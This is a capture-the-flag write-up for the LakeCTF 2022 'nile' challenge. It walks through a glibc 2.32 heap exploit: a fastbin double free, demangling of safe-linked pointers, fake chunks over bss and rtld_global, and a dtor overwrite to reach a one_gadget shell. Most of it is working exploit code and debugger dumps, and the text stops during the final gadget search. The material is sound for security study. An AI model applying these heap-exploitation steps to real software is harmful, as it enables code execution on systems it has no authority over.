LakeCTF Qualifications 2022 - nile
When I wrote this challenge, glibc 2.32 was the latest and greatest, so I made sure I could exploit this on 2.27, 2.29, 2.31 and 2.32. I only expect you to do the 2.32 version ;)
nc chall.polygl0ts.ch 3800
Team: Super Guesser
Attachment: nile libc-2.32.so Dockerfile ld-2.32.so xpl.py
Welcome to Nile, the newest and most advanced publishing and selling platform known to mankind.
Would you like to:
1. Add a fake endorsement
2. Add a brief description
3. Review your current entries
4. Remove some data
5. Upgrade your plan
6. quit
>
nile
was kind of your regular heap note challenge, where you can add, view and free chunks. But it had some twists, which made it quite hard to exploit.
With adding a fake endorsement we can add 0x30
chunks and adding descriptions will create 0x50
chunks. All chunks are allocated via calloc
, so tcache
cannot be abused, because calloc
will not serve chunks from tcache
. So the easy path via tcache
poisoning is not feasible :(
Also, since the challenge is using libc-2.32
, we have to keep in mind, that we cannot directly use double frees, since tcache
will check for that. But we can get around this, by first freeing 7 chunks regularly into tcache
. After tcache
is filled, the following frees will be handled in main_arena
, which enables us to use double free again.
With this, we can start leaking heap values (again, libc-2.32
is used, so heap addresses will be mangled).
def exploit(r):
r.recvuntil("> ")
# create initial chunks
for i in range(12):
adddesc(0x20-8, "A"*(0x20-8))
# fillup tcache
for i in range(7):
remove(i)
# upgrade to be able to allocate more chunks
upgrade()
# double free first chunk
remove(0)
remove(1)
remove(0)
# add a new chunk (0 and 11 will now point to the same chunk)
adddesc(0x20-8, "A") # 11
# free chunk 0
remove(0)
# leak heap value from chunk 11 (which is now freed)
LEAK = u64(review()[:-1].ljust(8, "\x00"))
log.info("LEAK : %s" % hex(LEAK))
One thing to note for this… When developing the exploit locally with ASLR disabled, the leak will look wrong.
$ python xpl.py
[*] '/home/kileak/ctf/lake/nilework/libc-2.32.so'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process './nile': pid 53115
[53115]
[*] Paused (press any to continue)
[*] LEAK : 0x835d
This happens, because the mangled heap address will contain null bytes.
0x55555555d5b0: 0x0000000000000000 0x0000000000000051
0x55555555d5c0: 0x000055500000835d 0x0000000000000000 <= mangled ptr
0x55555555d5d0: 0x0000000000000000 0x0000000000000000
0x55555555d5e0: 0x0000000000000000 0x0000000000000000
0x55555555d5f0: 0x0000000000000000 0x0000000000000000
0x55555555d600: 0x0000000000000000 0x0000000000000051
Though with ASLR enabled, it will not contain any null bytes most of the time and can just be read this way.
kileak@beast:~/ctf/lake/nilework$ python xpl.py
[*] '/home/kileak/ctf/lake/nilework/libc-2.32.so'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process './nile': pid 53219
[53219]
[*] Paused (press any to continue)
[*] LEAK : 0x55681185831f
But while developing the exploit, we don’t want to activate ASLR, so, since we know that the leak will work correctly remote, we can just add a small fix to let our exploit also work locally with ASLR deactivated.
# leak heap value from chunk 11 (which is now freed)
with open("/proc/sys/kernel/randomize_va_space", "r") as f:
state = f.read()[0]
print(hexdump(state))
ASLR = state == "2"
if LOCAL and not ASLR:
LEAK = 0x000055500000835d # 0x000055500000811d
else:
LEAK = u64(review()[:-1].ljust(8, "\x00"))
log.info("LEAK : %s" % hex(LEAK))
So, when we’re running locally and ASLR is disabled, we just set the value, it “should” be and from here on, we can debug it with and without ASLR the same.
$ python xpl.py
[*] '/home/kileak/ctf/lake/nilework/libc-2.32.so'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process './nile': pid 54387
[54387]
[*] Paused (press any to continue)
[*] LEAK : 0x55500000835d
This will give us a mangled heap pointer, which can luckily be reversed to get to the real heap address.
def demangle(obfus_ptr):
o2 = (obfus_ptr >> 12) ^ obfus_ptr
return (o2 >> 24) ^ o2
...
HEAP = demangle(LEAK)
$ python xpl.py
[*] '/home/kileak/ctf/lake/nilework/libc-2.32.so'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process './nile': pid 54785
[54785]
[*] Paused (press any to continue)
[*] LEAK : 0x55500000835d
[*] HEAP : 0x55555555d600
This wasn’t too hard, but from here the real pain began (also not having a debug version of libc/ld at hand didn’t make it any better).
We have a double free, but since it’s handled via calloc
, the chunks have to be 16 byte aligned and they need to have a correct size (0x50 or 0x30), so we cannot just allocate anywhere…
But let’s start with the obvious things first. We need a libc
leak.
For this, it would be useful to free a chunk, that will not be handled as a fastbin, but we can only create 0x30
and 0x50
chunks… Except, when doing an upgrade: This will allocate a 0xc00
chunk on the heap, in which the chunks of the professional plan will be stored.
If we could free this chunk, we would get some main_arena
pointers onto the heap, which we might be able to leak afterwards, so let’s start with that.
While preparing the previous heap leak, I also triggered the upgrade
functionality. This was done on purpose, since after the leak, we still have a double freed pointer in main_arena
and also already having allocated the 0xc00
chunk for the professional plan on the heap.
main_arena
0x7ffff7fc19f0: 0x0000000000000000 0x0000000000000000
0x7ffff7fc1a00: 0x0000000000000000 0x0000000000000001
0x7ffff7fc1a10: 0x0000000000000000 0x0000000000000000
0x7ffff7fc1a20: 0x0000000000000000 0x000055555555d5b0 <= 0x50 free chunk
0x7ffff7fc1a30: 0x0000000000000000 0x0000000000000000
0x7ffff7fc1a40: 0x0000000000000000 0x0000000000000000
0x7ffff7fc1a50: 0x0000000000000000 0x0000000000000000
0x7ffff7fc1a60: 0x000055555555e260 0x0000000000000000
0x7ffff7fc1a70: 0x00007ffff7fc1a60 0x00007ffff7fc1a60
0x7ffff7fc1a80: 0x00007ffff7fc1a70 0x00007ffff7fc1a70
gef➤ x/30gx 0x000055555555d5b0
0x55555555d5b0: 0x0000000000000000 0x0000000000000051
0x55555555d5c0: 0x000055500000835d 0x0000000000000000
0x55555555d5d0: 0x0000000000000000 0x0000000000000000
0x55555555d5e0: 0x0000000000000000 0x0000000000000000
0x000055500000835d ^ 0x55555555d = 0x55555555d600
gef➤ x/30gx 0x000055555555d600
0x55555555d600: 0x0000000000000000 0x0000000000000051
0x55555555d610: 0x00005550000080ed 0x4141414141414141
0x55555555d620: 0x4141414141414141 0x0000000000000000
0x55555555d630: 0x0000000000000000 0x0000000000000000
0x55555555d640: 0x0000000000000000 0x0000000000000000
0x55555555d650: 0x0000000000000000 0x0000000000000c11 <= insert fake chunk here
0x55555555d660: 0x000055555555d5c0 0x0000000000000040 <= pro plan chunk
0x55555555d670: 0x0000000000000000 0x0000000000000000
0x00005550000080ed ^ 0x55555555d = 0x55555555d5b0
We’ll use the next allocation to overwrite the FD pointer of the first chunk with a pointer pointing to the pro_plan chunk.
After that we’ll allocate the next chunk (which is directly above the pro plan chunk) and now put a valid chunk size above the pro_plan chunk.
The next allocation will then get our fake chunk on top of the pro plan, and since we put a valid chunk size there, it should succeed.
GUARD = HEAP >> 12
log.info("HEAP guard : %s" % hex(GUARD))
# overwrite FD of double freed chunk with pointer above pro plan chunk
adddesc(0x20-8, p64(HEAP+0x40^GUARD))
# create size for fake 0x50 chunk before pro_plan chunk
payload = p64(0) + p64(0)
payload += p64(0) + p64(0)
payload += p64(0) + p64(0)
payload += p64(0) + p64(0x51)[:1]
adddesc(len(payload), payload)
# get fake FD into main_arena
adddesc(0x20-8, "C"*(0x20-8))
adddesc(0x20-8, p64(HEAP+0x40^GUARD))
0x55555555d5b0: 0x0000000000000000 0x0000000000000051
0x55555555d5c0: 0x000055500000831d 0x0000000000000000 <= overwritten FD
0x55555555d5d0: 0x0000000000000000 0x0000000000000000
0x55555555d5e0: 0x0000000000000000 0x0000000000000000
0x55555555d5f0: 0x0000000000000000 0x0000000000000000
0x55555555d600: 0x0000000000000000 0x0000000000000051
0x000055500000831d ^ 0x55555555d = 0x55555555d640 (points above pro plan chunk)
adddesc(len(payload), payload)
0x55555555d600: 0x0000000000000000 0x0000000000000051
0x55555555d610: 0x0000000000000000 0x0000000000000000
0x55555555d620: 0x0000000000000000 0x0000000000000000
0x55555555d630: 0x0000000000000000 0x0000000000000000
0x55555555d640: 0x0000000000000000 0x0000000000000051 <= fake chunk size
0x55555555d650: 0x0000000000000000 0x0000000000000c11
0x55555555d660: 0x000055555555d5c0 0x0000000000000040
adddesc(0x20-8, "C"*(0x20-8))
0x7ffff7fc19f0: 0x0000000000000000 0x0000000000000000 <= main_arena
0x7ffff7fc1a00: 0x0000000000000000 0x0000000000000001
0x7ffff7fc1a10: 0x0000000000000000 0x0000000000000000
0x7ffff7fc1a20: 0x0000000000000000 0x000055555555d640 <= PTR to our fake chunk
0x7ffff7fc1a30: 0x0000000000000000 0x0000000000000000
0x7ffff7fc1a40: 0x0000000000000000 0x0000000000000000
0x7ffff7fc1a50: 0x0000000000000000 0x0000000000000000
The next 0x50
allocation will thus serve our fake chunk, with which we can overwrite the first bytes from the pro_plan chunk.
# allocate fake chunk and overwrite pro_plan chunk
payload = p64(0) + p64(0xc11)
payload += p64(HEAP+0x60) + p64(0x40) # chunk ptr / size
payload += p64(0x0) + p64(HEAP+0x60) # is_freed / chunk_ptr
payload += p64(0x40) # size
adddesc(len(payload), payload)
This will put a pointer to the pro_plan itself into the first pro chunk slot, which we could now free to get a free bin on the heap, but this will trigger malloc_consolidate
, which will notice, that our chunks are totally messed up and abort.
malloc_consolidate(): unaligned fastbin chunk detected
But luckily, we can get around this, by creating a dummy endorsement, which will fix this for us.
# create endorsement to avoid crash in malloc_consolidate
addfake(0x20-8, "A")
# free pro_plan chunk (free unsorted bin now)
remove(3)
0x55555555d640: 0x0000000000000000 0x0000000000000051
0x55555555d650: 0x0000000000000000 0x0000000000000c11
0x55555555d660: 0x00007ffff7fc1a60 0x00007ffff7fc1a60
0x55555555d670: 0x0000000000000000 0x0000000000000000
0x55555555d680: 0x0000000000000000 0x0000000000000001
0x55555555d690: 0x0000000000000000 0x0000000000000040
0x55555555d6a0: 0x0000000000000000 0x000055555555d5c0
0x55555555d6b0: 0x0000000000000040 0x0000000000000000
0x55555555d6c0: 0x000055555555d650 0x0000000000000040
0x55555555d6d0: 0x0000000000000000 0x000055555555e270
0x55555555d6e0: 0x0000000000000020 0x0000000000000000
Ok, so finally some libc pointers on the heap, now we’ll just need to get them “reviewable”. We have to keep in mind, that any allocation will now be served from the freed bin, thus overwriting the pro plan entries itself and also move the libc addresses down the heap.
# allocate chunks pointing to freed unsorted bin address (so they can be reviewed)
payload = p64(HEAP+0x120) + p64(0x0)
payload += p64(0)
addfake(len(payload), payload)
addfake(len(payload), payload)
addfake(len(payload), payload)
addfake(len(payload), payload)
Allocating 4 0x30
chunks in the unsorted bin with pointers to where the main_arena pointers will be after those allocation will result in a valid pro_plan.
0x55555555d650: 0x0000000000000000 0x0000000000000031
0x55555555d660: 0x000055555555d720 0x0000000000000000 <= slot 1 buffer / slot 1 size
0x55555555d670: 0x0000000000000000 0x0000000000000000 <= slot 1 freed / slot 2 buffer
0x55555555d680: 0x0000000000000000 0x0000000000000031 <= slot 2 size / slot 2 freed
0x55555555d690: 0x000055555555d720 0x0000000000000000 <= slot 3 buffer / slot 3 size
0x55555555d6a0: 0x0000000000000000 0x0000000000000000 <= slot 3 freed / slot 4 buffer
0x55555555d6b0: 0x0000000000000000 0x0000000000000031 <= slot 4 size / slot 4 freed
0x55555555d6c0: 0x000055555555d720 0x0000000000000000 <= slot 5 buffer / slot 5 size
0x55555555d6d0: 0x0000000000000000 0x0000000000000000 <= slot 5 freed / slot 6 buffer
0x55555555d6e0: 0x0000000000000000 0x0000000000000031 <= slot 6 size / slot 6 freed
0x55555555d6f0: 0x000055555555d720 0x0000000000000000 <= slot 7 buffer / slot 7 size
0x55555555d700: 0x0000000000000000 0x0000000000000000 <= slot 7 freed
0x55555555d710: 0x0000000000000000 0x0000000000000b51
0x55555555d720: 0x00007ffff7fc1a60 0x00007ffff7fc1a60 <= main_arena pointers
Though every second slot has an invalid buffer, this is not an issue anymore, since the IsFree
part of it contains 0x31
, so it will be skipped in review
(as it will interpret those as freed notes) and we can just leak the other slots with valid pointers.
# leak main arena ptr from review
LEAK = u64(review()[:6].ljust(8, "\x00"))
libc.address = LEAK - 0x1c2a60
log.info("LIBC leak : %s" % hex(LEAK))
log.info("LIBC : %s" % hex(libc.address))
[*] LIBC leak : 0x7ffff7fc1a60
[*] LIBC : 0x7ffff7dff000
Now, how to get rip control from here on?
First, I checked, if there were any valid chunk sizes (16 byte-aligned) in libc
or ld
, which could help us to overwrite something useful (I was already thinking in the direction of rtld_global
there, since with aligned chunks, I didn’t see any feasible way to overwrite malloc_hook
or free_hook
).
But no chance, didn’t find any region, which contained a value, with which we could allocate a 0x50
or 0x30
chunk.
So, after a lot of failed tries, I checked bss
to see, if we could somehow do something there.
0x555555558000 <free@got.plt>: 0x00007ffff7e8b2f0 0x0000555555555046
0x555555558010 <puts@got.plt>: 0x00007ffff7e76380 0x0000555555555066
0x555555558020 <printf@got.plt>: 0x00007ffff7e57b10 0x00007ffff7eefeb0
0x555555558030 <calloc@got.plt>: 0x00007ffff7e8ba50 0x00007ffff7e7c5e0
0x555555558040 <setvbuf@got.plt>: 0x00007ffff7e76aa0 0x00007ffff7e58f60
0x555555558050: 0x0000000000000000 0x0000555555558058
0x555555558060 <stdout@GLIBC_2.2.5>: 0x00007ffff7fc2520 0x0000000000000000
0x555555558070 <stdin@GLIBC_2.2.5>: 0x00007ffff7fc1800 0x0000000000000000
0x555555558080 <stderr@GLIBC_2.2.5>: 0x00007ffff7fc2440 0x0000000000000000
0x555555558090: 0x0000000000000000 0x0000000000000000
0x5555555580a0 <free_plan>: 0x0000000000000002 0x0000000000000002
0x5555555580b0 <free_plan+16>: 0x00005555555581d0 0x0000000000000000
0x5555555580c0 <pro_plan>: 0x0000000000000080 0x000000000000000a <= max pro bound / current pro count
0x5555555580d0 <pro_plan+16>: 0x000055555555d660 0x0000000000000000 <= pro plan chunk
0x5555555580e0 <free_plan_data>: 0x000055555555d2a0 0x0000000000000000
Also no good chunk sizes there, to for example attack got
table… But, can we create a fake chunk anywhere in bss
?
Well, we kind of control the current pro count
by adding more chunks, so we could create a valid chunk size there, and allocate a chunk overlapping the pointer to the pro_plan
itself.
This will not allow us to “directly” write data anywhere, but we could let it point to a table structure (like dtors). Creating chunks then in the pro plan
, could potentially overwrite a table entry with a heap chunk, from which _dl_fini
would then fetch the function to execute, which could lead to rip control.
But, this would also mean, that we need to be able to do a clean exit
, since the challenge will call cleanup
before exitting, which will try to free
all currently allocated chunks (which will most likely fail, after the whole mess we created by now on the heap).
We’ll also need to find a way around that, but let’s keep that for later.
First we’ll need a leak to elf
region:
# overwrite an allocated chunk with pointer to pie address
payload = p64(libc.address+0x1c1d80) + p64(0x0)
payload += p64(0) + p64(0x51)[:1] # fix chunksize
addfake(len(payload), payload)
# leak pie address from review
PIE = u64(review().split("\n")[4].ljust(8, "\x00"))
log.info("PIE : %s" % hex(PIE))
This will create another entry in our freed pro plan
, with its buffer pointing to a libc address, that contains a pointer to our elf
.
But at the current state, the heap is such a mess, that almost every allocation will go haywire. Thus we also need to put a valid chunksize in our payload to fix the followup fastbin. Otherwise malloc
will notice the invalid fastbin and crash.
Allocations and frees really start to get a pain from here on…
[*] PIE : 0x555555558080
With this, we were successful on leaking an address pointing to bss
, so we can now prepare putting a fake chunk there.
But trying to use the double free to allocate a chunk onto bss
now, triggered again malloc_consolidate
and it checked the unsorted bin on the heap, which… well… wasn’t linked correctly anymore, since we were overwriting it with pro plan chunks.
So, let’s first take a detour to repair this…
# double free
remove(0)
remove(1)
remove(0)
# point fd to unsorted bin
adddesc(0x10, p64((HEAP+0x130)^GUARD))
adddesc(0x10, p64(0xdeadbeef))
adddesc(0x10, p64(0xdeadbeef))
# fix unsorted bin pointers
payload = p64(0) + p64(0x21)
payload += p64(libc.address+0x1c2a60) + p64(libc.address+0x1c2a60)
payload += p64(0x20) + p64(0x20)
adddesc(len(payload), payload)
We use the double free again to allocate a fake chunk overlapping the bin, and then with the last allocation overwrite the size of the bin with 0x20
and putting valid main_arena
pointers into it. By resizing it, we won’t have to bother with it anymore, since we’ll never do an allocation that could fit into a 0x20
bin, so hopefully, we’re good now.
Now, we can go on with allocating into bss
, by first increasing the pro plan counter
, so that when our final allocation happens, we’ll have a 0x50
size in it.
# increase pro plan counter
for i in range(61):
addfake(10, "A")
# double free
remove(0)
remove(1)
remove(0)
# overwrite FD with pointer to pro_plan address
adddesc(0x10, p64((PIE+0x40)^GUARD))
adddesc(0x10, p64(0xdeadbeef))
adddesc(0x10, p64(0xdeadbeef))
bss
0x5555555580b0 <free_plan+16>: 0x00005555555581d0 0x0000000000000000
0x5555555580c0 <pro_plan>: 0x0000000000000080 0x000000000000004f <= pro plan counter
0x5555555580d0 <pro_plan+16>: 0x000055555555d660 0x0000000000000000
0x5555555580e0 <free_plan_data>: 0x000055555555d2a0 0x0000000000000000
main_arena
0x7ffff7fc1a00: 0x0000000000000000 0x0000000000000001
0x7ffff7fc1a10: 0x0000000000000000 0x0000000000000000
0x7ffff7fc1a20: 0x0000000000000000 0x00005555555580c0 <= 0x50 fastbin pointing to pro_plan chunk
0x7ffff7fc1a30: 0x0000000000000000 0x0000000000000000
0x7ffff7fc1a40: 0x0000000000000000 0x0000000000000000
0x7ffff7fc1a50: 0x0000000000000000 0x0000000000000000
0x7ffff7fc1a60: 0x000055555555ee00 0x000055555555d740
Looking good. The next allocation will increase the pro plan counter
to 0x50
and then allocate the next chunk at 0x00005555555580c0
, which will succeed, since we have a valid chunk size there now.
So, with the next chunk, we’ll be able to overwrite the pro_plan
pointer itself. Keep in mind, that we’ll not be able to write arbitrary data there, but we’ll overwrite the target region with pointers to our heap chunks. That’s why I went for rtld_global
.
After some experimentation (aka debugging the hell out of _dlfini
), the following region looked good
0x7ffff7ffe1d0: 0x0000000000000000 0x00007ffff7ffe728
0x7ffff7ffe1e0: 0x0000000000000000 0x000055555555c010
0x7ffff7ffe1f0: 0x000055555555c0f0 0x000055555555c0e0
0x7ffff7ffe200: 0x0000000000000000 0x000055555555c090
0x7ffff7ffe210: 0x000055555555c0a0 0x000055555555c120
0x7ffff7ffe220: 0x000055555555c130 0x000055555555c140
0x7ffff7ffe230: 0x000055555555c0b0 0x000055555555c0c0
0x7ffff7ffe240: 0x000055555555c020 0x000055555555c030
We have to keep in mind, that we have already allocated 0x50
chunks, so when overwriting the pro_plan
counter, we want to point it to dest_address-(0x50*0x18)
, so that the next allocations will be written to dest_address
.
We’ll first start putting some placeholder chunks there, which will be needed later (this is the result from hours of fiddling around in
ld
, so it’s a bit hard to explain in the right order, but should become clearer later on)
if LOCAL and not ASLR:
LD = libc.address + 0x1d1000
else:
LD = libc.address + 0x1cb000
RTLD = LD + 0x2e1d0
TARGET = RTLD-(0x50*24)
log.info("TARGET CHUNK : %s" % hex(RTLD))
# overwrite pro_plan address with address in rtld_global
payload = p64(TARGET)
adddesc(len(payload), payload)
addfake(20, "X"*19)
addfake(20, "Y"*19)
# put a gadget placeholder here for later
payload = "Z"*8 + p64(0xdeadbeef)
addfake(20, payload)
gef➤ x/30gx 0x7ffff7ffe1d0
0x7ffff7ffe1d0: 0x000055555555ee10 0x0000000000000020 chunk / size
0x7ffff7ffe1e0: 0x0000000000000000 0x000055555555ee40 is_freed / chunk
0x7ffff7ffe1f0: 0x0000000000000020 0x0000000000000000 size / is_freed
0x7ffff7ffe200: 0x000055555555ee70 0x0000000000000020 chunk / size
0x7ffff7ffe210: 0x0000000000000000 0x000055555555c120 is_freed
0x7ffff7ffe220: 0x000055555555c130 0x000055555555c140
0x7ffff7ffe230: 0x000055555555c0b0 0x000055555555c0c0
If we could exit now (getting through cleanup without a crash), this would just exit cleanly, since we don’t have overwritten any dtors by now. This was just to prepare some placeholders, which we’ll need later to be able to cleanly call one_gadget
.
With the next allocations, we’ll overwrite a dtor pointer, which will be called later on, but we now have to also think about, how we can survice cleanup
in order to arrive at _dl_fini
at all.
# double free
remove(0)
remove(1)
remove(0)
CALL = 0xfacebabe
# overwrite free fd with ptr to pro plan again
adddesc(0x10, p64((PIE+0x40)^GUARD))
adddesc(0x10, p64(0xdeadbeef)+p64(0xcafebabe))
adddesc(0x10, p64(0xdeadbeef)+p64(CALL)) # overwrite dtor entry
addfake(20, "A")
We again trigger a double free, so that we can control, where next allocations will go to. We then overwrite the FD of the doubly freed chunk with a pointer to pro_plan
again. Then we’ll allocate a dummy chunk to pull in our fake fd into main_arena
.
The last description will now overwrite a dtor pointer in rtld_global
with 0xfacebabe
, which could lead to code execution, if we make it there.
gef➤ x/30gx 0x7ffff7ffe1d0
0x7ffff7ffe1d0: 0x000055555555ee10 0x0000000000000020
0x7ffff7ffe1e0: 0x0000000000000000 0x000055555555ee40
0x7ffff7ffe1f0: 0x0000000000000020 0x0000000000000000
0x7ffff7ffe200: 0x000055555555ee70 0x0000000000000020
0x7ffff7ffe210: 0x0000000000000000 0x000055555555d5c0
0x7ffff7ffe220: 0x0000000000000040 0x0000000000000000
0x7ffff7ffe230: 0x000055555555d610 0x0000000000000040
0x7ffff7ffe240: 0x0000000000000000 0x000055555555d5c0 <= fake dtor chunk
0x7ffff7ffe250: 0x0000000000000040 0x0000000000000000
0x7ffff7ffe260: 0x000055555555eea0 0x0000000000000020
gef➤ x/30gx 0x000055555555d5c0
0x55555555d5c0: 0x00000000deadbeef 0x00000000facebabe <= dtor entry
0x55555555d5d0: 0x0000000000000000 0x0000000000000000
0x55555555d5e0: 0x0000000000000000 0x0000000000000000
0x55555555d5f0: 0x0000000000000000 0x0000000000000000
0x55555555d600: 0x0000000000000000 0x0000000000000051
The next allocation, will again overwrite the pro_plan
pointer, since we already placed a FD pointing there in main_arena
.
We’ll now let it point directly above itself (subtracting the appropriate offset of already allocated chunks again).
# overwrite pro_plan with address above pro plan to overwrite allocated chunk count (to make free work)
TARGET = (PIE+0x38)-(0x58*24)
payload = p64(TARGET)
adddesc(len(payload), payload)
0x5555555580a0 <free_plan>: 0x0000000000000002 0x0000000000000002
0x5555555580b0 <free_plan+16>: 0x00005555555581d0 0x0000000000000000 <= next allocation will be stored here
0x5555555580c0 <pro_plan>: 0x0000000000000080 0x0000000000000058
0x5555555580d0 <pro_plan+16>: 0x0000555555557878 0x0000000000000000
By doing this, the next chunk allocation will write the buffer address to 0x5555555580b8
, its size to 0x5555555580c0
and it’s is_freed
value to 0x5555555580c0
(which happens to be the pro_plan counter
).
This will effectively set the pro_plan_counter
to 0
. Exactly what we need to fix cleanup
.
ONE_GADGET = libc.address + 0xcda5d
payload = "B"*0x10
payload += p64(ONE_GADGET)
addfake(31, payload)
0x5555555580b0 <free_plan+16>: 0x00005555555581d0 0x000055555555eed0
0x5555555580c0 <pro_plan>: 0x0000000000000020 0x0000000000000000 <= pro_plan_counter 0
0x5555555580d0 <pro_plan+16>: 0x0000555555557878 0x0000000000000000
Finally, time to exit and trigger our chain (and to fix it up).
Since, cleanup
is now executed nice and clean, we’ll end up in dl_fini
, running into our fake dtors there.
$rax : 0x000055555555d5c0 → 0x00000000deadbeef
$rbx : 0x00007ffff7ffd000 → 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f
$rcx : 0x0
$rdx : 0x0000555555557dd8 → 0x0000555555555170 → <__do_global_dtors_aux+0> endbr64
$rsp : 0x00007fffffffda80 → 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f
$rbp : 0x00007fffffffdaf0 → 0x0000000000000000
$rsi : 0x0
$rdi : 0x0000555555558060 → 0x00007ffff7fc2520 → 0x00000000fbad2887
$rip : 0x00007ffff7fe16a4 → 0xff07034908408b48
$r8 : 0x2
$r9 : 0x1
$r10 : 0x00007ffff7f73ac0 → 0x0000000100000000
$r11 : 0x246
$r12 : 0x0
$r13 : 0x00007fffffffda80 → 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f
$r14 : 0x0000555555557dd0 → 0x00005555555551c0 → <frame_dummy+0> endbr64
$r15 : 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f
$eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
───────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0x7ffff7fe1698 mov rax, QWORD PTR [r15+0xa8]
0x7ffff7fe169f test rax, rax
0x7ffff7fe16a2 je 0x7ffff7fe16ad
●→ 0x7ffff7fe16a4 mov rax, QWORD PTR [rax+0x8]
0x7ffff7fe16a8 add rax, QWORD PTR [r15]
0x7ffff7fe16ab call rax
0x7ffff7fe16ad mov esi, DWORD PTR [rbp-0x3c]
0x7ffff7fe16b0 test esi, esi
0x7ffff7fe16b2 jne 0x7ffff7fe16c2
──────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffda80│+0x0000: 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f ← $rsp, $r13
0x00007fffffffda88│+0x0008: 0x00007ffff7ffe750 → 0x00007ffff7fce000 → 0x00010102464c457f
0x00007fffffffda90│+0x0010: 0x00007ffff7fc8000 → 0x00007ffff7dff000 → 0x03010102464c457f
0x00007fffffffda98│+0x0018: 0x00007ffff7ffda08 → 0x00007ffff7fd0000 → 0x00010102464c457f
0x00007fffffffdaa0│+0x0020: 0x00007fffffffdaa0 → [loop detected]
0x00007fffffffdaa8│+0x0028: 0x00007fffffffdaa0 → 0x00007fffffffdaa0 → [loop detected]
This will now fetch the value from rax+0x8
and add the value at r15
(0x0000555555554000
, which is elf base
) to it, and then call it.
We previously put 0xfacebabe
there, so this would now call 0x55565023fabe
. Not quite right, so let’s go back there and fix that value.
CALL = 0x7ffffacebabe
# overwrite free fd with ptr to pro plan again
adddesc(0x10, p64((PIE+0x40)^GUARD))
adddesc(0x10, p64(0xdeadbeef)+p64(0xcafebabe))
adddesc(0x10, p64(0xdeadbeef)+p64(CALL-(PIE-0x4080)))
$rax : 0x7ffffacebabe
$rbx : 0x00007ffff7ffd000 → 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f
$rcx : 0x0
$rdx : 0x0000555555557dd8 → 0x0000555555555170 → <__do_global_dtors_aux+0> endbr64
$rsp : 0x00007fffffffda80 → 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f
$rbp : 0x00007fffffffdaf0 → 0x0000000000000000
$rsi : 0x0
$rdi : 0x0000555555558060 → 0x00007ffff7fc2520 → 0x00000000fbad2887
$rip : 0x00007ffff7fe16ab → 0x75f685c4758bd0ff
$r8 : 0x2
$r9 : 0x1
$r10 : 0x00007ffff7f73ac0 → 0x0000000100000000
$r11 : 0x246
$r12 : 0x0
$r13 : 0x00007fffffffda80 → 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f
$r14 : 0x0000555555557dd0 → 0x00005555555551c0 → <frame_dummy+0> endbr64
$r15 : 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f
$eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
──────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0x7ffff7fe16a2 je 0x7ffff7fe16ad
● 0x7ffff7fe16a4 mov rax, QWORD PTR [rax+0x8]
0x7ffff7fe16a8 add rax, QWORD PTR [r15]
→ 0x7ffff7fe16ab call rax
0x7ffff7fe16ad mov esi, DWORD PTR [rbp-0x3c]
0x7ffff7fe16b0 test esi, esi
0x7ffff7fe16b2 jne 0x7ffff7fe16c2
0x7ffff7fe16b4 mov ecx, DWORD PTR [rip+0x1b046] # 0x7ffff7ffc700
0x7ffff7fe16ba test ecx, ecx
─────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffda80│+0x0000: 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f ← $rsp, $r13
0x00007fffffffda88│+0x0008: 0x00007ffff7ffe750 → 0x00007ffff7fce000 → 0x00010102464c457f
0x00007fffffffda90│+0x0010: 0x00007ffff7fc8000 → 0x00007ffff7dff000 → 0x03010102464c457f
0x00007fffffffda98│+0x0018: 0x00007ffff7ffda08 → 0x00007ffff7fd0000 → 0x00010102464c457f
0x00007fffffffdaa0│+0x0020: 0x00007fffffffdaa0 → [loop detected]
0x00007fffffffdaa8│+0x0028: 0x00007fffffffdaa0 → 0x00007fffffffdaa0 → [loop detected]
Calling 0x7ffffacebabe
… Seems, we have rip control, yay…
But wait… None of the one_gadget constraints can be fullfilled, and also none of the registers point anywhere useful to maybe do some stack pivoting =(
0xcda5d execve("/bin/sh", r12, rdx)
constraints:
[r12] == NULL || r12 == NULL
[rdx] == NULL || rdx == NULL
This would have been a good candidate, since r12
is already 0x0
, but rdx
contains an address, thus we cannot use it (for now…).
Well, this took quite some time to come up with a solution for, but after wading through countless gadgets to make anything useful from the situation, I came up with this:
0x7ffff7f2cd44: mov rax,QWORD PTR [r15+0x60]
0x7ffff7f2cd48: call QWORD PTR [rax+0x8]
$r15
is pointing to the ld
region, we overwrote with our pro plan
chunks.
gef➤ x/10gx 0x00007ffff7ffe1a0+0x60
0x7ffff7ffe200: 0x000055555555ee70 0x0000000000000020
0x7ffff7ffe210: 0x0000000000000000 0x000055555555d5c0
0x7ffff7ffe220: 0x0000000000000040 0x0000000000000000
0x7ffff7ffe230: 0x000055555555d610 0x0000000000000040
0x7ffff7ffe240: 0x0000000000000000 0x000055555555d5c0
gef➤ x/10gx 0x000055555555ee70
0x55555555ee70: 0x5a5a5a5a5a5a5a5a 0x00000000deadbeef
